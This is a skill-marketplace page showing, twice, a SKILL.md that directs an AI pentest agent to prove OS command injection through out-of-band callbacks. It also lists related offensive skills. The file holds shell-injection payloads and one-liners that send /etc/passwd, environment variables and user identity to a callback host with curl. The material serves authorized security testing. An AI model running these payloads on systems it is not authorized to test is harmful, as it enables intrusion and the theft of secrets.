Run any Skill in Manus with one click

$pwd:

command-injection-rce

Name: Command Injection Rce
Author: vigolium

// Turn suspected OS command injection (a parameter that lands in a shell or a child process) into proof of remote code execution via an OAST callback, plus one safe demonstration of follow-on impact (read a file, list users, env dump). Use when a parameter feeds an exec/spawn/system call, when payloads with $(), `` ` ``, `;`, `|`, `&&` cause response differences, or when audit flags CWE-78 / CWE-77. Never sends destructive commands.

Run Skill in Manus

$ git log --oneline --stat

stars:586

forks:90

updated:May 23, 2026 at 16:43

SKILL.md

readonly

name	command-injection-rce
description	Turn suspected OS command injection (a parameter that lands in a shell or a child process) into proof of remote code execution via an OAST callback, plus one safe demonstration of follow-on impact (read a file, list users, env dump). Use when a parameter feeds an exec/spawn/system call, when payloads with $(), `` ` ``, `;`, `\|`, `&&` cause response differences, or when audit flags CWE-78 / CWE-77. Never sends destructive commands.
license	MIT
allowed-tools	["query_records","inspect_record","replay_request","oast_mint","oast_poll","attack_kit","report_finding","update_finding","remember","update_plan"]

Command Injection → RCE Proof

You have a parameter that smells like it lands in a shell or process exec call. Your job is to prove arbitrary command execution by getting an OAST callback from the server, then demonstrate one minimal follow-on action (a file read, an env dump). Reporting "the response changed when I sent ;" is not enough.

When this skill applies

A parameter feeds something likely to exec: cmd=, host= (ping), target= (traceroute), file= (image conversion, PDF render, zip/tar), filter=, format= (ffmpeg, imagemagick), name= on a user-management endpoint that shells out.
Response differs when you send characters that have shell meaning: ;, |, &, &&, ||, `, $(...), \n.
A 500 error message reveals a binary name (sh, bash, convert, ffmpeg, ImageMagick, node, python, php) in the stack trace or response body.
Audit finding: CWE-78 (OS command injection), CWE-77 (command injection), CWE-94 (code injection).

Workflow

1. Confirm a shell metacharacter changes behavior

Pick a candidate parameter from query_records + inspect_record. Send three replay_request probes:

Baseline: harmless value (e.g. 8.8.8.8 for a ping endpoint).
8.8.8.8; → trailing separator. Status / length differential?
8.8.8.8 && echo hi → does hi appear in the response, or does the response take longer?

If none of these change the response, the parameter is probably sanitized or doesn't shell out. Stop and pick another candidate.

remember the candidate parameter and which metacharacter triggered the differential (key: cmdinj-target).

2. Confirm execution via OAST

Mint a canary with oast_mint (kind: cmdinj-probe). Inject a payload that performs a DNS or HTTP request to the canary. Choose the encoding by the suspected OS / language:

Generic shell: value; curl <canary> or value && nslookup <canary>
Backticks: value`` curl `` (works insh/bash`).
$() substitution: value$(curl <canary>).
Windows cmd.exe: value & nslookup <canary> (note the single &).
PowerShell: value; Invoke-WebRequest <canary>.

Use attack_kit with class: "cmd-injection" to pull canonical payload patterns for the parameter's encoding (URL vs JSON vs header).

Poll oast_poll for 60 seconds. The first DNS or HTTP callback proves execution. DNS-only is still proof (most internal hosts can resolve external names even when HTTP egress is blocked).

remember the callback proof (timestamp, payload, callback URL) with key cmdinj-proof.

3. One follow-on demonstration

Once RCE is proven, send ONE additional payload to size impact. Pick the cheapest demo that establishes "the attacker has hands on the box":

File read: ; curl <canary>?d=$(cat /etc/passwd | base64) (base64 to survive DNS encoding; expect truncation).
Env dump: ; env | curl --data-binary @- <canary>
Hostname / user: ; (whoami; hostname; id) | curl --data-binary @- <canary>

Wait for the callback. Decode the leaked data (base64 if you used it). Include ONE line of the leaked data in the finding — not the whole /etc/passwd.

Do not run destructive commands: no rm, no > /etc/..., no package installs, no port scans, no reverse shells, no persistent mechanisms. The callback + one small data fetch is sufficient proof.

4. Persist the finding

report_finding:

severity: critical — OS command execution on the server is always critical regardless of what you leaked.
title: name the endpoint, parameter, and the proof: "OS command injection in /api/render filter parameter; OAST callback + reads /etc/passwd".
cwe_id: CWE-78.
description: 3-4 sentences. The endpoint, the trigger metacharacter, the OAST callback timestamp, and one masked line of the follow-on demo (e.g., "first /etc/passwd line: root:x:0:0:...").
Include the exact payload that triggered the callback.

Pitfalls

A response delay when you send ; sleep 5 is suggestive but not proof — networking jitter and shared rate limiters cause similar delays. Require an OAST callback before claiming RCE.
Some sandboxes (gVisor, nsjail) restrict egress; DNS-only callbacks may be all you get. Note that explicitly in the finding.
Image processors (convert, ffmpeg) sometimes have shell injection via filenames or annotation fields — these surfaces are less obvious than cmd=; check filenames.
Argument-injection (without shell) is a related but distinct flaw — --config=/etc/passwd against a tool that reads --config files. Still report as CWE-77 / CWE-78 if it leaks data.
If the callback URL is base64-encoded data, decode and read it before reporting — sometimes the payload encoding garbled the data in transit and what you have is just truncated noise, not proof.

Output expectations

One report_finding (critical) with payload + callback timestamp + one masked line of leaked data.
A remember note (key: cmdinj-proof) with the canonical payload.
Plan item marked done.

related-skills.json

same repository

audit-auth.md

from "vigolium/vigolium"

Audit authentication and session-management code for common issues — weak JWT config, session fixation, password-handling flaws, insecure cookies, broken OAuth flows, and missing auth checks on routes. Use when the user asks to review auth code or when source-aware scanning targets login/session/token handling.

2026-05-23586

escalate-auth-bypass.md

from "vigolium/vigolium"

Turn a suspected or confirmed authentication/authorization bypass into impact — admin access, session takeover, privilege escalation, or cross-tenant read. Use when you find a missing auth check on a route, a weak JWT verifier, a session cookie that's predictable or reusable across users, a privilege field client-controllable, or an audit finding tagged CWE-287/CWE-863/CWE-639. Walks from probe to admin-equivalent capability and persists a finding with the highest-impact action you reached.

2026-05-23586

idor-blast-radius.md

from "vigolium/vigolium"

When you find an Insecure Direct Object Reference (a URL/body parameter that lets you read or write another user's object), quantify the blast radius — how many records reachable, what data class, whether write is also unauthorized — and persist a finding sized by real impact rather than by the existence of the flaw. Use when an ID parameter (numeric, UUID, hash, slug) changes the response content across IDs, when CWE-639/CWE-284 was flagged, or when an audit finding hints at object-level access control gaps.

2026-05-23586

sqli-to-data-exfil.md

from "vigolium/vigolium"

Escalate a suspected or confirmed SQL injection into proof-level data exfiltration. Use when you spot an SQL error in a response, a record from a prior scan flagged a SQLi pattern, or boolean/time differentials indicate the payload reaches the query parser. Walks from probe → confirm → enumerate → exfil with payload-class-aware techniques (in-band, blind boolean, blind time, blind OAST) and ends by persisting a concrete finding with the leaked sample.

2026-05-23586

ssrf-to-internal-service-breach.md

from "vigolium/vigolium"

Escalate a suspected or confirmed Server-Side Request Forgery into proof of internal-service access — cloud metadata, internal-only APIs, database greetings, or redacted-but-fetchable HTTP. Use when a parameter takes a URL (image proxy, webhook, fetcher, URL preview, PDF render) and the server reaches outbound on your behalf, or when an audit finding tags CWE-918. Confirms reachability via OAST, then walks targeted internal endpoints, ending with a finding sized by the highest-value asset reached.

2026-05-23586

triage-finding.md

from "vigolium/vigolium"

Deduplicate, prioritize, and sanity-check a list of raw scanner findings. Use after a dynamic scan completes or when the user asks to review a findings dump. Produces a triaged list with severity adjustments, false-positive calls, and exploitability notes.

2026-05-23586

package.json

"author": "vigolium"

"repository": "vigolium/vigolium"

View GitHub Repository View Creator Repositories

$ install --global

$ download --local

Run Skill in Manus

$ useful --forSOC

Information Security AnalystsComputer and Mathematical Occupations15-1212L4

name	command-injection-rce
description	Turn suspected OS command injection (a parameter that lands in a shell or a child process) into proof of remote code execution via an OAST callback, plus one safe demonstration of follow-on impact (read a file, list users, env dump). Use when a parameter feeds an exec/spawn/system call, when payloads with $(), `` ` ``, `;`, `\|`, `&&` cause response differences, or when audit flags CWE-78 / CWE-77. Never sends destructive commands.
license	MIT
allowed-tools	["query_records","inspect_record","replay_request","oast_mint","oast_poll","attack_kit","report_finding","update_finding","remember","update_plan"]

Command Injection → RCE Proof

When this skill applies

A parameter feeds something likely to exec: cmd=, host= (ping), target= (traceroute), file= (image conversion, PDF render, zip/tar), filter=, format= (ffmpeg, imagemagick), name= on a user-management endpoint that shells out.
Response differs when you send characters that have shell meaning: ;, |, &, &&, ||, `, $(...), \n.
A 500 error message reveals a binary name (sh, bash, convert, ffmpeg, ImageMagick, node, python, php) in the stack trace or response body.
Audit finding: CWE-78 (OS command injection), CWE-77 (command injection), CWE-94 (code injection).

Workflow

1. Confirm a shell metacharacter changes behavior

Pick a candidate parameter from query_records + inspect_record. Send three replay_request probes:

Baseline: harmless value (e.g. 8.8.8.8 for a ping endpoint).
8.8.8.8; → trailing separator. Status / length differential?
8.8.8.8 && echo hi → does hi appear in the response, or does the response take longer?

If none of these change the response, the parameter is probably sanitized or doesn't shell out. Stop and pick another candidate.

remember the candidate parameter and which metacharacter triggered the differential (key: cmdinj-target).

2. Confirm execution via OAST

Mint a canary with oast_mint (kind: cmdinj-probe). Inject a payload that performs a DNS or HTTP request to the canary. Choose the encoding by the suspected OS / language:

Generic shell: value; curl <canary> or value && nslookup <canary>
Backticks: value`` curl `` (works insh/bash`).
$() substitution: value$(curl <canary>).
Windows cmd.exe: value & nslookup <canary> (note the single &).
PowerShell: value; Invoke-WebRequest <canary>.

Use attack_kit with class: "cmd-injection" to pull canonical payload patterns for the parameter's encoding (URL vs JSON vs header).

Poll oast_poll for 60 seconds. The first DNS or HTTP callback proves execution. DNS-only is still proof (most internal hosts can resolve external names even when HTTP egress is blocked).

remember the callback proof (timestamp, payload, callback URL) with key cmdinj-proof.

3. One follow-on demonstration

Once RCE is proven, send ONE additional payload to size impact. Pick the cheapest demo that establishes "the attacker has hands on the box":

File read: ; curl <canary>?d=$(cat /etc/passwd | base64) (base64 to survive DNS encoding; expect truncation).
Env dump: ; env | curl --data-binary @- <canary>
Hostname / user: ; (whoami; hostname; id) | curl --data-binary @- <canary>

Wait for the callback. Decode the leaked data (base64 if you used it). Include ONE line of the leaked data in the finding — not the whole /etc/passwd.

4. Persist the finding

report_finding:

severity: critical — OS command execution on the server is always critical regardless of what you leaked.
title: name the endpoint, parameter, and the proof: "OS command injection in /api/render filter parameter; OAST callback + reads /etc/passwd".
cwe_id: CWE-78.
description: 3-4 sentences. The endpoint, the trigger metacharacter, the OAST callback timestamp, and one masked line of the follow-on demo (e.g., "first /etc/passwd line: root:x:0:0:...").
Include the exact payload that triggered the callback.

Pitfalls

A response delay when you send ; sleep 5 is suggestive but not proof — networking jitter and shared rate limiters cause similar delays. Require an OAST callback before claiming RCE.
Some sandboxes (gVisor, nsjail) restrict egress; DNS-only callbacks may be all you get. Note that explicitly in the finding.
Image processors (convert, ffmpeg) sometimes have shell injection via filenames or annotation fields — these surfaces are less obvious than cmd=; check filenames.
Argument-injection (without shell) is a related but distinct flaw — --config=/etc/passwd against a tool that reads --config files. Still report as CWE-77 / CWE-78 if it leaks data.
If the callback URL is base64-encoded data, decode and read it before reporting — sometimes the payload encoding garbled the data in transit and what you have is just truncated noise, not proof.

Output expectations

One report_finding (critical) with payload + callback timestamp + one masked line of leaked data.
A remember note (key: cmdinj-proof) with the canonical payload.
Plan item marked done.

command-injection-rce

Command Injection → RCE Proof

When this skill applies

Workflow

1. Confirm a shell metacharacter changes behavior

2. Confirm execution via OAST

3. One follow-on demonstration

4. Persist the finding

Pitfalls

Output expectations

More from this repository

Command Injection → RCE Proof

When this skill applies

Workflow

1. Confirm a shell metacharacter changes behavior

2. Confirm execution via OAST

3. One follow-on demonstration

4. Persist the finding

Pitfalls

Output expectations

More from this repository